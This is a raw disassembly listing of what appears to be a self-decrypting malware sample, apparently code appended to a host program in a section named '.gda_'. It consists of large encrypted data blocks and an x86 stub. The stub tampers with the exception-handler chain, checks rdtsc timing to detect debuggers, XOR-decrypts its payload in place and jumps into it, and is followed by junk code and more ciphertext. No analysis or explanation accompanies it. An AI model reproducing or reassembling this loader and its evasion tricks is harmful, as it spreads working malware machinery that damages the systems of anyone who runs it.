4F106D1Bh dd 15CB000Eh, 0B0DE1FECh, 9A834879h, 74ADEB88h, 2948B687h dd 331BA892h, 51808A71h, 132BF05Ah, 15430060h, 0B0DE1FD4h dd 0D020D810h, 0F86A6198h, 400B81E1h, 8E13552h, 0D57FC0CEh dd 709ED893h, 80C80038h, 3DEB262Ch, 0D03E5010h, 75DF602Eh dd 107EB833h, 306AA0D8h, 9676D48Dh, 482365EFh, 90C8000Eh dd 0B69D205Ch, 0E882F5F2h, 75DF60AEh, 107EB833h, 3068E0D8h dd 5702CB8Dh, 7202221Ah, 7B3FE2EEh, 82EFAA51h, 60AEABAh dd 221B977Ah, 746A0BDCh, 0B330A257h, 66B7A445h, 0F4A7E018h dd 6F37FAE6h, 8F6895A7h, 45F7404Eh, 0F01E5B22h, 2F343547h dd 0A597A0EEh, 50BEFBD6h, 4FC06D95h, 545000Eh, 0B0DE1F28h dd 0D0621229h, 0CF4CD567h, 85B7808Eh, 305E9B76h, 6FEC7507h dd 0E557E02Eh, 90FE3B16h, 8EB895D5h, 65F7404Eh, 0F01E5FF8h dd 0BADD7FEEh, 0B36896E3h, 66B7A45Dh, 986BE018h, 90C80038h dd 31E94A05h, 0E63FD695h, 0FFD83898h, 53C0579h, 0F0EDA0EEh dd 0AF40433Bh, 0F569EFE8h, 90FE154Ch, 0B0F81D9Bh, 0CC7D4052h dd 0D454E1FEh, 6539ECB4h, 0F480C0CBh, 25773F07h, 8A7C081Dh dd 4220FFC7h, 0D117DFA7h, 0A825BF56h, 483A54CEh, 1048809Dh dd 0CFCD48B8h, 69FD3F07h, 408CA493h, 0AE98B5B5h, 0E063206Eh dd 0EA892670h, 0D55B629Eh, 1048E8EEh, 0F4E3A027h, 0DAC092h dd 4B5275E7h, 544B000Eh, 0ECD6A150h, 0A5547F47h, 0F4EEE39Bh dd 0EFB20150h, 0CF174827h, 93E93F07h, 70A894A0h, 2879EB38h dd 0B0E82077h, 0D0085D90h, 0F008A298h, 1048B000h, 307848D8h dd 744AC0F8h, 712D5818h, 93200038h, 72E82058h, 84854054h dd 0DEE56CBCh, 6C48783Bh, 3080C0C1h, 0DB88C0F8h, 2D98C44Ch dd 7D491AB3h, 0B0DE1835h, 2FE99490h, 0F4EA0167h, 134A87B8h dd 0D269A5DEh, 93FB9F03h, 3815FF6Ah, 8D004432h, 49h, 1CDh dup(0) dd 0FFE00000h, 12h, 13DAh dup(0) db 0 ; --------------------------------------------------------------------------- push ebp mov ebp, esp call loc_31432013 call sub_314320A5 jmp near ptr byte_31432058 ; --------------------------------------------------------------------------- loc_31432013: ; CODE XREF: .gda_:31432004p push dword ptr fs:0 mov fs:0, esp mov ds:dword_31432059, ebp xor edx, edx push edx push edx push edx push edx push edx push edx push 80000000h push 1 push edx push edx push 40h call ds:dword_3142808C ; LoadLibraryA xor edx, edx push edx push 80000000h push edx push edx push edx push edx push edx push edx call ds:dword_3142808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_31432058 db 0BDh ; CODE XREF: .gda_:3143200Ej dword_31432059 dd 12FFC0h ; DATA XREF: .gda_:3143201Fw ; --------------------------------------------------------------------------- sub eax, eax loc_3143205F: ; CODE XREF: .gda_:31432065j dec al or al, al jz short loc_31432069 jnz short loc_3143205F jmp short loc_314320D0 ; --------------------------------------------------------------------------- loc_31432069: ; CODE XREF: .gda_:31432063j call $+5 pop esi add esi, 44h sub edi, edi or edi, 2898h mov ecx, 28h push esi loc_31432083: ; CODE XREF: .gda_:31432096j xchg al, [esi] stc xor ax, cx cld cld cld mov [esi], al add esi, 1 sub edi, 1 or edi, edi jnz short loc_31432083 pop esi mov ecx, [ebp-8] mov fs:0, ecx leave jmp esi ; =============== S U B R O U T I N E ======================================= sub_314320A5 proc near ; CODE XREF: .gda_:31432009p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_314320A5 endp ; sp-analysis failed ; --------------------------------------------------------------------------- dw 0E8h dd 8B000000h, 89FC2404h, 2FCB98h, 8680F700h, 28h, 8B800000h dd 7404245Ch ; --------------------------------------------------------------------------- loc_314320D0: ; CODE XREF: .gda_:31432067j sub eax, 0CFB08959h das ; --------------------------------------------------------------------------- dw 0 ; --------------------------------------------------------------------------- push edi pop dword ptr [eax+2FD3h] cmp byte ptr [eax+288Ah], 0E8h jnz short loc_314320F5 add ebx, [eax+288Bh] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_314320FD ; --------------------------------------------------------------------------- loc_314320F5: ; CODE XREF: .gda_:314320E6j mov ebx, [eax+288Ch] push dword ptr [ebx] loc_314320FD: ; CODE XREF: .gda_:314320F3j pop ebx push ebp mov ebp, eax sub dword ptr [esp+4], 80B6h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+363898h] mov ecx, 0 rep movsb call sub_31432173 mov ecx, eax call sub_31432173 sub eax, ecx jz short loc_31432147 cmp eax, 100h ja short loc_31432147 lea eax, [ebp+3610D4h] mov dl, [eax-10h] call sub_31432177 jmp short loc_31432186 ; --------------------------------------------------------------------------- loc_31432147: ; CODE XREF: .gda_:3143212Ej ; .gda_:31432135j test dword ptr [ebp+36388Bh], 80000000h jz short loc_31432171 lea esi, [ebp+36388Fh] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FD4h] mov edi, [ebp+363FD8h] mov ebx, [ebp+363FD0h] loc_31432171: ; CODE XREF: .gda_:31432151j pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_31432173 proc near ; CODE XREF: .gda_:31432120p ; .gda_:31432127p rdtsc retn sub_31432173 endp ; --------------------------------------------------------------------------- db 18h ; =============== S U B R O U T I N E ======================================= sub_31432177 proc near ; CODE XREF: .gda_:31432140p mov dh, dl mov ecx, 27B7h loc_3143217E: ; CODE XREF: sub_31432177+Cj xor [eax], dl inc eax add dl, dh loop loc_3143217E retn sub_31432177 endp ; --------------------------------------------------------------------------- loc_31432186: ; CODE XREF: .gda_:31432145j cdq ror dword ptr [eax-70h], cl xchg ebp, [edi+29h] mov ebx, 4960A496h dec ebx loc_31432193: ; CODE XREF: .gda_:31432199j and al, 60h add [ebx-50h], esi leave loopne loc_31432193 db 65h mov ebx, 9CCB739Bh ficom word ptr [ecx-30h] push eax pop ebp inc ebp movsb jmp short loc_314321D3 ; --------------------------------------------------------------------------- db 0E8h ; --------------------------------------------------------------------------- stosd adc edx, [ebx-7Eh] sub [ebx+736B4872h], ch leave sbb eax, 919E23CBh push eax inc edx sub al, 20h std test eax, 6FEDA839h jnp short loc_31432239 sub al, 14h jge short near ptr loc_3143223B+3 inc edx cdq test [ebx], esi and [esp+ebx], ebp loc_314321D3: ; CODE XREF: .gda_:314321A9j fistp dword ptr [edx] movsb sal dword ptr [ebx+144FEF3Bh], 66h retf ; --------------------------------------------------------------------------- dw 6C22h dd 0E4335B8Bh, 0D8EB036Fh, 90786044h, 83B7ACEBh, 3E59686Dh dd 0B0FDEC0Ch, 992E1F9Bh, 46636EADh, 0D0B54888h, 425B00E8h dd 0F50C012Dh, 9EBDB6EDh, 338617Ch, 35115697h, 10CEDBFAh dd 70584DC0h, 0A4DDE788h, 446B61A4h, 0FF0A120Dh, 0F8BC0DAh db 0DEh, 0A9h, 0BDh ; --------------------------------------------------------------------------- loc_31432233: ; CODE XREF: .gda_:loc_31432239j push bx mov dh, 98h pop eax ; --------------------------------------------------------------------------- db 0Bh ; --------------------------------------------------------------------------- loc_31432239: ; CODE XREF: .gda_:314321C6j jecxz short loc_31432233 loc_3143223B: ; CODE XREF: .gda_:314321CAj adc [ebp-740BA880h], ch loc_31432241: ; CODE XREF: .gda_:3143229Aj pop edi inc edi das mov eax, 73068DFFh push esi js short loc_31432261 push 0B715DCFh and [eax], bh rcl ch, 1 lodsd lea eax, [esi+48DE1C8h] loc_3143225C: ; CODE XREF: .gda_:3143229Fj xlat cmc mov [edi-42h], cl loc_31432261: ; CODE XREF: .gda_:3143224Aj mov al, ds:15C55D46h db 2Eh xor bh, al in eax, 0FCh ; AT 80287 data. ; 286 sends opcodes & operands and receives results. test [esi-7408CC40h], ebx test [ebp+eax*2+3398805Eh], edi insd xchg eax, esp in eax, dx sub es:[eax-25h], al aad 0F0h ; CODE XREF: .gda_:314322BAj mov ch, 8Eh shr al, 1 cmp dword ptr [ebp+78565D4Ch], 0FFFFFF90h inc dword ptr [esi] pop ebp and bl, [edx] push ss cmp [ecx-1Fh], dl xor eax, 0E0FE8BA2h jnz short loc_31432241 fcom dword ptr [ebp+6Eh] jo short loc_3143225C imul esi, ds:2E3BAE6Dh, 9040F930h sbb ebp, [ebx-8502740h] mov ch, 0BEh imul ebx, [esi-80h], 59h pop eax xlat out dx, eax jl short near ptr loc_3143227F+1 sub [eax+58h], al sti iret ; --------------------------------------------------------------------------- db 0B4h, 0D2h, 90h dd 3070C3EBh, 19706058h, 0C6E3FE2Dh, 3FC84808h, 0B0F28068h dd 2B467537h, 0B0DD401Eh, 0D2562487h, 0BD8F00E8h, 0A66860FDh dd 49374BA8h, 50382BF4h, 0A0986DE9h, 8575E0FEh, 706E527Ah dd 3247057Bh, 0BB38EC6Bh, 0A3700AB4h, 65559968h, 500E3B31h dd 4C132B9Bh, 0EEE8B741h, 180F5C6Fh, 0D0B9A08Bh, 0B269517h dd 54FB607Eh, 0FF184588h, 503ABF8Ch, 0B0F21768h, 1090E1A2h dd 18D8402Ch, 0D0B9A088h, 0B269517h, 50FD607Eh, 0F25A44A7h dd 50522008h, 0B098E838h, 1092E0CCh, 2754A8E9h, 0B8E8A1E2h dd 301900E9h, 0AB46F5B7h, 0FAB0C09Eh, 0AF382108h, 86A3BEFDh dd 10FD08C8h, 21B14028h, 0BAB8A08Ah, 3AFB59E8h, 5876A22h dd 0F0EEFB1Ah, 0D3FBD1E3h, 86A3DED5h, 94F7E0C8h, 7058421Ch dd 0D0B8A660h, 744C4EE8h, 6F782C04h, 0C6E3BA3Dh, 9A8DAD08h dd 8398B67Fh, 0D6456D01h, 0C1587613h, 0A3503386h, 0B31800EAh dd 0A6439AF5h, 74D7C0A8h, 50382208h, 8B5205E3h, 6007E0FEh dd 92DDCF29h, 5BB896BFh, 623E26Dh, 91089F48h, 0C8F74527h dd 0D5B3203Eh, 0B0AEBBA6h, 9FF99037h, 466076ADh, 2352B88h dd 0D31836D3h, 91099F52h, 0C89B4527h, 0DDB3203Eh, 0B0AEBBB2h dd 6107E92Bh, 20DDCF29h, 38B896B0h, 30180150h, 0AC28DDC5h dd 3F53C09Eh, 89CE2062h, 339CF097h, 5092E329h, 1A0FB92Bh dd 5DA0CA88h, 60DD75Dh, 9061D948h, 0F455C0A8h, 0AFC7DE45h dd 3D33E697h, 10F8ADCCh, 0DB3E4028h, 7BBCE705h, 0A595E4DAh dd 904E5AB4h, 0F251A604h, 92BB8B6Eh, 3B6D626Ah, 78F88A1Ch dd 70582FD8h, 0D0D26C03h, 3072C463h, 90786020h, 0A198AAA0h dd 364A5Ah, 8B4E1597h, 93A0E0FEh, 803000ECh, 5BB8A0E7h dd 0BB186A3Ch, 0FA380A84h, 0A2DAAAA8h, 0A0502062h, 0DA988007h dd 0EF92B1C8h, 0AECDBF78h, 8FB896B3h, 3FE785B1h, 907967CCh dd 0F06D4DA8h, 0E9381618h, 0B0988B94h, 0B50B0F43h, 6058ADA9h dd 5535A0BEh, 302E14D0h, 0C42880B7h, 0FB2E0C2h, 6BDEB5F7h dd 701D805Eh, 0F8CC9597h, 70584165h, 0D0B8B160h, 747D53E8h dd 0F70D022Dh, 86B1B2F8h, 375D4C61h, 58CF800Dh, 10F8E586h dd 4F0CF5D7h, 4547A0BEh, 302E3B82h, 0BEED9F1Fh, 9AD8F693h dd 0AF3A4A08h, 86A3DEFDh, 11D059C8h, 5BCF4028h, 0F4B42969h dd 0A5E757BCh, 904E5BEAh, 555B369Bh, 500E1C36h, 4FCFD468h dd 26C3465Dh, 498C528h, 2E3BE6EEh, 0CFF672ECh, 0FA70443Ch dd 0FF2AAA8h, 6603BE9Dh, 0C4580568h, 96107314h, 4358402Dh dd 0EA5B3141h, 0C2685D1h, 0A20D607Eh, 0D4FCBC29h, 234A536Bh dd 7119A81Ch, 10F8EE5Ch, 26081478h, 83E8F0D9h, 0B4E9517h dd 50FD607Eh, 0FD7B4F1h, 0DF30047Ch, 86A4BEEDh, 0ED3D08C8h dd 8F0BBFD7h, 0E6838E1Dh, 0B196EBE8h, 9079488Ch, 652797A8h dd 500E1B26h, 8BB61597h, 7811E0FEh, 70A7BFD3h, 0BAB8CAD2h dd 5A186AE8h, 90790848h, 3453C0ACh, 3A682062h, 4F5C0B64h dd 4F80B62Ah, 4358401Ch, 2F624841h, 0A595FF17h, 904E750Fh dd 0A08991FAh, 6B0AB5F7h, 741B805Eh, 48A023E8h, 5FA84070h dd 0DEE7A088h, 301900E8h, 90786048h, 0F0D8C0A8h, 78B32008h dd 0B0988068h, 46A9E0C8h, 4ACDBF7Bh, 7BB896B3h, 0F09CACB1h dd 7E9A9B3Dh, 814D4D6Bh, 2381611h, 8B0A1597h, 9571E0FEh dd 706E7F7Ch, 0D0B8B660h, 5F774CE8h, 0C0081523h, 99AEA9DAh dd 355F4564h, 0C5F4E13Eh, 40F8A1ADh, 4B62D5D7h, 5531A0BEh dd 302E3FB0h, 0F13A3C8Bh, 9196A5DBh, 1F5C4565h, 0D3FDEA0Ah dd 46A493BCh, 133D135Ch, 0A3D4A0FCh, 5574729Ch, 0E23B6026h dd 95ACA1CDh, 3554494Eh, 0C2DB8029h, 758C81ADh, 1534296Eh dd 0A0C8C1C5h, 717F6E81h, 0F50A2348h, 0A0BDB4C9h, 355B4F7Ah dd 0B0D9F31Bh, 719D928Bh, 150A255Ch, 0B5CCCFE5h, 556A68BCh dd 0D3780429h, 84B9A5DAh, 2250746Dh, 0B0FCE10Dh, 719D928Bh dd 1F0C255Ch, 0B5D0CCE7h, 22B7084h, 0E0190E1Bh, 84B7A8DBh dd 39406508h, 0C2F0D41Ch, 109C81ADh, 1534296Eh, 0B5D5C9DCh dd 494B6FBCh, 0FD1D143Bh, 95B5A9FCh, 354A6608h, 0D2F1CC0Dh dd 698A81BAh, 43D0728h, 0B5D4C9CEh, 426C74A9h, 0E40D0221h dd 0F099B3CDh, 164C454Fh, 0E3FDEC01h, 109D9AA1h, 362C256Fh dd 84DDCCE1h, 307D6D81h, 0DD0C050Fh, 9CADA4C7h, 3E59686Dh dd 0F1FDEC0Ch, 649DA7C8h, 35257Ch, 0B5D4C9CEh, 557561A6h dd 0F53F6009h, 9DBD94DCh, 24597078h, 0F798C100h, 75AE94ADh dd 1F31335Ah, 0B5FFA0E6h, 427D569Ch, 0FE17093Bh, 0F099B8EDh dd 64C454Fh, 0DDEDEC07h, 7696A9ADh, 11353247h, 0BED7C9FCh dd 5F5400A9h, 0F9340429h, 82B9B2CAh, 1D386171h, 0D9CEF009h dd 76B797ADh, 1534296Eh, 0B5C8EF88h, 5C714686h, 0E0192D2Dh dd 97B6A9D8h, 20772049h, 0C2C8EE0Dh, 639D83A7h, 208405Bh dd 0A3DDC3E7h, 762A339Bh, 0E40B1221h, 9FAA90A8h, 234B456Bh dd 0D5D6B25Bh, 43F894B0h, 191E344Dh, 0A4F9C5E4h, 5271729Ch dd 0E31D143Dh, 958BC0E9h, 3C51667Ch, 0DDF1D40Dh, 7CABE0ADh dd 7028254Dh, 0A4CBD9DBh, 594C6D8Dh, 0FF2C0525h, 95B4A9EEh dd 3555495Ch, 0DDF6D568h, 79AE90A9h, 1617374Dh, 0B5D4C9CEh dd 427156E8h, 0FC19153Ch, 9FB4ACE9h, 226F206Bh, 0F6FDF401h dd 109D8CA1h, 14193466h, 0A4CBD5E2h, 467172B8h, 0F71D0C21h dd 9F8CB3CDh, 50564563h, 0C2DBF426h, 758C81ADh, 1534296Eh dd 93CCEE88h, 4479659Ah, 0FF0A302Dh, 83ABA5CBh, 134C6E08h dd 0C4F9E51Ah, 7F8AB0ADh, 32B254Bh, 9EB8D8CDh, 556A439Ch dd 0C31D1429h, 99ACA3CDh, 1E384E67h, 0D5EAC31Ch, 459D94A9h dd 202A255Bh, 0B5DBCFFAh, 7E18739Bh, 0E0192D3Ch, 87BDA9FEh dd 356B4647h, 0DFF1F40Bh, 64B6E0A6h, 1E3D3067h, 0B5D4C9CEh dd 7F6C4EE8h, 0C0160538h, 95BBAFDAh, 3F6C537Bh, 0B0F6E503h dd 60B79486h, 150B2E4Dh, 0BFD1D4EBh, 44560086h, 0E4171218h dd 0A6ACA3CDh, 254C5261h, 0D5D5EC09h, 698A8FA5h, 212C0E28h dd 0A9CAC5FDh, 5F7E6EA1h, 0E4190D3Ah, 0A4B6AFC1h, 3E5D4B67h dd 0E7ECCE68h, 758C89BAh, 42A297Eh, 9DD4C1FDh, 42776D8Dh dd 0E42A6031h, 99B695C4h, 355C4F6Bh, 0D9EAF43Bh, 7FAC87A6h dd 192B2E69h, 0B9CAD4DBh, 67186786h, 0E42B211Bh, 85ACB2C9h dd 3C5B2078h, 0C3FDF307h, 759383A7h, 1F3B405Ch, 0B3DDCEE6h dd 557F009Ch, 0E317083Ch, 9EA1A2DCh, 505D4D69h, 0C6FBE51Ah dd 7E9D93C8h, 1F2B404Ch, 0A4DDCBEBh, 447649E8h, 0F516122Dh dd 9FB483DCh, 3170457Bh, 0D5F4E406h, 6496A9C8h, 1536324Dh dd 0A4DDE7FCh, 5E766FABh, 0F50C032Dh, 91AC93CCh, 1938457Ch dd 0C2FDF406h, 5F8C85A6h, 31362558h, 0A4D6E988h, 5576728Dh dd 0F5082F3Ch, 9CAA95C6h, 3E712049h, 0DEEAE51Ch, 75AA94ADh dd 191E2449h, 91B8C5E4h, 605956ACh, 0BE4A5301h, 0F0948CECh dd 135F455Ah, 0D5EBEF04h, 10818583h, 3F3F257Ah, 9BD6C5F8h dd 485D798Dh, 0F52A6009h, 95AD91CFh, 316E597Ah, 0F5FDF504h dd 42F8A1B0h, 150B274Dh, 0BCD9F6FCh, 485D659Dh, 0A32E6009h dd 0A6DAAA5Eh, 3AECAB5Eh, 0C267D269h, 8507B6D0h, 706E7F70h dd 86EE6403h, 0CF4E50BEh, 5877838h, 0F0EEFB6Eh, 0E28E48Bh dd 3D9888AAh, 0D8D31B81h, 70582879h, 9C354888h, 307203CCh dd 0C0296522h, 7BDDAAFBh, 84B370C4h, 0F0F2D438h, 0EFABB299h dd 4663AEBDh, 0DC7C2388h dd 0BEE9517h, 54FB607Eh, 655503A0h, 500E1AF4h, 0B0F2495Bh dd 10C8889Ah, 0B4D3401Ah, 90D2F1D9h, 287251B8h, 0C470A0CBh dd 0F88CEC2h, 6603CA9Dh, 905C0368h, 0D07D32FBh, 879AD927h dd 129BF852h, 0CF2B572Bh, 6F87A1A0h, 555CCF57h, 382008h dd 0B0F77000h, 7A2C6BC8h, 1A94CB28h, 0D0B8C8C8h, 327200F8h dd 0F8780A1Ah, 0F0D8AF58h, 3692062h, 6E0D7F38h, 4FF8D6F3h dd 5ECDBF71h, 55B896B3h, 0BB697417h, 0A66D1CC5h, 7DD423A8h dd 6628209Dh, 0E7498368h, 9B2A1F9Bh, 46638AADh, 31372D88h dd 0D81800CFh, 6F879F63h, 0CB3A4523h, 0DFB5203Eh, 0B098A846h dd 0EF07FA20h, 0BEDDCBD7h, 5DB896B3h, 30303567h, 6F718848h dd 75533F57h, 500E1BDAh, 90EC40EDh, 38BA6F45h, 84B04028h dd 5B475F76h, 623DA6Dh, 0E4B8E548h, 0BF574DA3h, 0B8382020h dd 4F677EB7h, 0D3A72743h, 7058A87Dh, 51E5A088h, 6031005h dd 1DB15348h, 0C6C6542Dh, 16C7108h, 0E1C9D039h, 2BA27537h dd 74DF401Eh, 0FE2D5FACh, 6D1836D3h, 0C578648Ah, 0F0D8C040h dd 0BDB97D08h, 0B0AE9B57h, 85751FA2h, 706E5B22h, 0F075F2D8h dd 303200CCh, 0F674A4CBh, 0EB88456Fh, 70F5203Eh, 0ABCA05AFh dd 10DCE0FEh, 0B3054002h, 38E0BAE2h, 301800E1h, 3A1922C5h dd 0AD0956h, 18AD49CBh, 0B598B654h, 52F0E84Ch, 4C10D5A1h dd 324FA0BEh, 30F0552Bh, 0CD786048h, 0EB412D29h, 0CDB3203Eh dd 0B0AEBC24h, 18DC9C4Bh, 0C9DC4F28h, 51B8A088h, 301A0804h dd 94103448h, 0FD8C0A9h, 6603A29Dh, 3D640B68h, 11FCC44Ch dd 1A084028h, 0D0BC4888h, 624E00E8h, 6F2F601Ah, 0C6E3BE3Dh dd 0DDF11308h, 0B09984FFh, 7AA9B1C8h, 7132112Ah, 0D0B8A0E0h dd 0A5E752A8h, 904E5B02h, 842E453Eh, 386C7053h, 0B098816Ch dd 344C1F9Fh, 70584208h, 0EC923577h, 0B54100DEh, 736E1488h dd 245390BCh, 16A2062h, 2567D63Fh, 10CEDB0Ah, 598C571h dd 4547F658h, 302E3BC6h, 0C23C37C5h, 0A89CAAFFh, 513CB785h dd 83338068h, 49E88A08h, 2008EBDBh, 80E8F0D8h, 0A5E752B8h dd 904E5B1Ah, 0F2D00429h, 24C72008h, 2567884Ch, 10CEDCD2h dd 6ACDBF7Bh, 8DB896B4h, 0B018042Ah, 910D6A76h, 88554BEEh dd 0B338161Dh, 0B00D0D71h, 13F8D6D8h, 0A2A716F9h, 58B7600Ch dd 301801F7h, 9168E447h, 0CE58C0A8h, 16285532h, 0BF98BEE8h dd 10F9E14Ch, 5066C028h, 51FE51FDh, 7E5150D6h, 1B3A150Fh dd 0F19E0667h, 1F60B47h, 0E6C98002h, 26D1F9Bh, 29587614h dd 55B761B3h, 30180037h, 8EF0E5C5h, 0F0B2C09Eh, 50382C60h dd 4FCBD068h, 26C4F25Dh, 70547D28h, 55B7A088h, 30180057h dd 9078D1A1h, 0A0E641A8h, 5F6E695Ah, 0B09825EDh, 183E63C8h dd 7F557C84h, 0D0B8390Ch, 45383CE8h, 0AA44CCBBh, 0F05445A7h dd 5D952008h, 90B8A048h, 759FC1F5h, 0DC27355Ch, 0ACCD80B4h dd 10E77E69h, 0E50C1420h, 0F3A641D9h, 7F171A78h, 0F75EE81Dh dd 21F7E037h, 707F5092h, 825A5788h, 0BAA9517h, 504B607Eh dd 0A08890F8h, 503829E0h, 0C7F7C468h, 71978CA6h, 0E5A7404Ch dd 0D08E9CAAh, 66CC06Dh, 15F1A97Bh, 0F0EEFCE4h, 52384859h dd 0E1C90068h, 8507B09Eh, 706E7C0Eh, 0CB2B3505h, 34800DEh dd 0C0293481h, 0F8991FAh, 66037A9Dh, 949C0768h, 2BD67537h dd 0B3A0401Eh, 0C5D32D08h, 0C91900DEh, 0FA790A8Bh, 0FEB3FA9h dd 45C7247Bh, 0EAEC40EDh, 0C0733BFBh, 205B4B9Bh, 670D2DB4h dd 0BB1836F5h, 90796CF2h, 0F8524BA8h, 53382009h, 0D053AB90h dd 0B60B2B43h, 375D3449h, 0FE53556Ah, 6317C76Bh, 1B2FACC3h dd 9A8C907Ch, 3A6A7148h, 5E0D7F97h, 9BF8D6F3h, 466322A5h dd 0DC7C2388h, 0D99BCFC3h, 0FA7FA74Fh, 79D828A8h, 3FB2347h dd 0E7CCC627h, 4CBDB289h, 23B2965h, 0B6D7D3E7h, 594F5C9Ch dd 0E7170426h, 859B9CDBh, 3E5D527Ah, 0C2FDD61Ch, 7E9789BBh dd 200574h, 0B5CACFE4h, 514C009Ah, 0E41D073Ah, 84ABAFE0h dd 50382208h, 0B098FF38h, 738A89C9h, 19226E4Ch, 0A096C6EDh dd 79560084h, 0F7582B0Bh, 9ABDA5CFh, 5A55436Bh, 0E2DDD33Dh dd 5FB295E8h, 56780E61h, 0A4CAC9FEh, 0D84D0A9Dh, 90786048h dd 6A3541F5h, 96381616h, 868DEBEDh, 8507E0C8h, 706E7BAEh dd 0A4A74849h, 0BB066AD4h, 0A6435EFDh, 0CC7499A8h, 36125526h dd 0AD67BEE9h, 0AD75C3BDh, 706E7C6Ah, 87BAD603h, 0BDBD664Dh dd 0A64FD7CDh, 2D5D4FA8h, 0AA38163Fh, 3C62C6E1h, 0A1031E86h dd 9B97A229h, 2B9048D8h, 4C9BFF17h, 0E57C686Ch, 0F0D028ECh dd 166B2008h, 0FCDCAE2Bh, 8507E084h, 706E7BBAh, 0DDCC6083h dd 631A6A7Bh, 0AB42F5B7h, 2027C09Eh, 0AEA6C89Bh, 0BB707F97h dd 43F8E0C8h, 3F07036Eh, 9CFC8EDBh, 0A5E700A4h, 904E5BDAh dd 0F264340h, 0A631C8F7h, 3D677F97h, 10CEF21Ah, 0F5D5891Bh dd 0D08E9F64h, 614951B9h, 0C1293118h, 0CB565557h, 5BD0203Eh dd 0E5988068h, 23AAA59Bh, 3C1C6E1Ah, 4547A0C4h, 302E3B7Ah dd 90786AA0h, 80ABB7A8h, 2456497Ah, 0E098C10Eh, 2BC27537h dd 0F5D1401Eh, 0D08E9BCAh, 0BD9531E7h, 904E7939h, 0CC904521h dd 0AF69203Eh, 86A312FDh, 149073C8h, 0FD584028h, 0E6A1DE3Dh dd 8D9559E8h, 904E5C66h, 0F2D0940h, 0D5FF46F7h, 0B0AE9E09h dd 0B57BB0C8h, 706E5E4Bh, 0F12D2D88h, 601836F6h, 0FA790A1Ch dd 0F2B092A8h, 0AFB82008h, 86A4B2FDh, 4A3865C8h, 0FDD5625Dh dd 0D08EBEDCh, 0BD1E6ABAh, 0A66601FDh, 0A08E94A8h, 0AF6A7158h dd 86A4B6FDh, 8507B8C8h, 706E7C06h, 0EEF7254Eh, 0D81800DEh dd 90786044h, 0B39793FFh, 7E0A1343h, 0B0D4CC2Ch, 2B6A7537h dd 18CB401Eh, 0D0B8A08Fh, 28CDB565h, 1D21607Eh, 0C6E33E15h dd 0A57CC808h, 0BC707F97h, 47F8E0C8h, 3E110E61h, 9496F4CDh dd 0CF184CA4h, 0A643F2DDh, 0FF1845A8h, 503A158Ch, 0B5F01368h dd 9DF8E0C8h, 4641539Dh, 6D35F988h, 302E3CF2h, 6F8D6DA0h dd 0EE654357h, 50381634h, 0B2880467h, 0FC79E0C8h, 705841B8h dd 0D1B9C8DCh, 0A5E700E8h, 904E5BB6h, 0F1480429h, 0DB682008h dd 0E298EABCh, 2CE67537h, 0B0DD401Eh, 0B8B5D5D1h, 30181360h dd 0ABCAF5B7h, 1233C09Eh, 4E5B9D8Bh, 0C598805Eh, 777D6DE1h dd 20587636h, 0ECB23577h, 0F09D00DEh, 91F1E447h, 0B053C0A8h dd 0AF38AB04h, 0D31D0F58h, 0D6F8D6D6h, 46660FADh, 0D0D2A188h dd 32720182h, 0AC6EF5B7h, 85BC09Eh, 30BC2FF7h, 23988069h dd 0EA77545h, 6032401Eh, 4547F3DAh, 302E3CEEh, 1577A0CDh dd 0F0D8C1E8h, 4E419D85h, 0B829805Eh, 0EF02A320h, 70CC28D7h dd 0FBE6A088h, 142C890Eh, 1AED9F1Ch, 7DD8F693h, 6626A7B5h dd 58993168h, 0EF071AECh, 6E2CD5A5h, 0D0D2A0BEh, 30181480h dd 6F2B3248h, 0C6E4D23Dh, 747CAD08h, 5C0D0D7Ch, 40F8D6F7h dd 0FB52F627h, 11AC84CCh, 7A1A0808h, 92327249h, 0FBDB8ABAh dd 0D030044Ch, 50598F89h, 54F3B1C0h, 42A7500Ch, 80052DD8h dd 0D81836D4h, 90786054h, 88EEEE8Dh, 7E180E28h, 95BDBA48h dd 68C0CEEDh, 5578380Dh, 9FF2AAFBh, 30384EA1h, 0D2ED9F1Fh dd 71D8F693h, 50388CCCh, 0E098EA68h, 8507B39Fh, 706E7C3Ah dd 0C53C2D03h, 307200DEh, 59137BABh, 0F53091A5h, 76382008h dd 0B092E44Dh, 526D1F9Fh, 0F3587613h, 3BE8AC4Ch, 301F68E3h dd 2DF56048h, 0F0EEDE25h, 0C5C7735Fh, 0B0AEBC7Ah, 4486204Dh dd 4C08F5A5h, 753BA0BEh dd 302E156Ch, 0DFF5ED48h, 0DBD8F696h, 1384AC6h, 2567D33Eh dd 10CEDCC6h, 0E58B8ABh, 2E3331A7h, 0C48B565h, 9DC8607Eh dd 0E0AD6E5Ah, 0AA09C868h, 0C2F97F97h, 9DF103DFh, 9AB3415Fh dd 1E936F03h, 0C48BD65h, 348B607Eh, 4933372Fh, 52ADDF5Bh dd 3098B654h, 26ED8B75h, 5A2C4128h, 0D0CD90E0h, 828DFFE8h dd 10785673h, 0C6E68F15h, 414C2008h, 0AEFB05AFh, 10F8E0FEh dd 0F59E4028h, 0D08E9EC7h, 0CE10E9E8h, 15BF9FB7h, 0F0EED5DCh dd 0D0382008h, 0B09C4235h, 30B7EAC5h, 1E372F46h, 0F0DECFA8h dd 557E6984h, 0B0374069h, 95B5A9DCh, 70575428h, 0D5F4E50Bh dd 649992AAh, 7A55614Dh, 0F09880A8h, 43384FC8h, 0F5150D3Dh dd 91BFE0DAh, 3E5D447Ah, 0E2928D49h, 7E9D8CADh, 33D2C5Ch dd 0F0C1CCFBh, 40686180h, 0FE194031h, 88BDE0CCh, 245B4578h dd 9CECEE09h, 718C93E8h, 1E312446h, 0FD989AEFh, 514F0AE5h dd 0F910033Ch, 91F8A7C6h, 34184C64h, 0D1B8F909h, 7ED884A6h dd 4302741h, 0BFDE80A4h, 427E209Ah, 0F4160521h, 0D091E0DBh dd 2451417Fh, 0E7928D52h, 758A85A0h, 152A2108h, 0A5D7D9A8h dd 427E20C4h, 0F4160521h, 0B3F8FFDBh, 715D4D67h, 90ECC948h dd 64D893A1h, 513D2D41h, 0F7CCE9A8h, 5174209Bh, 9459053Ch dd 0B8E8072Ch, 0C978175Ah, 994305E3h, 4E846DCh, 98E50029h dd 3BF23Ah, 67523B15h, 242CB11h, 0C001A455h, 75584EE7h dd 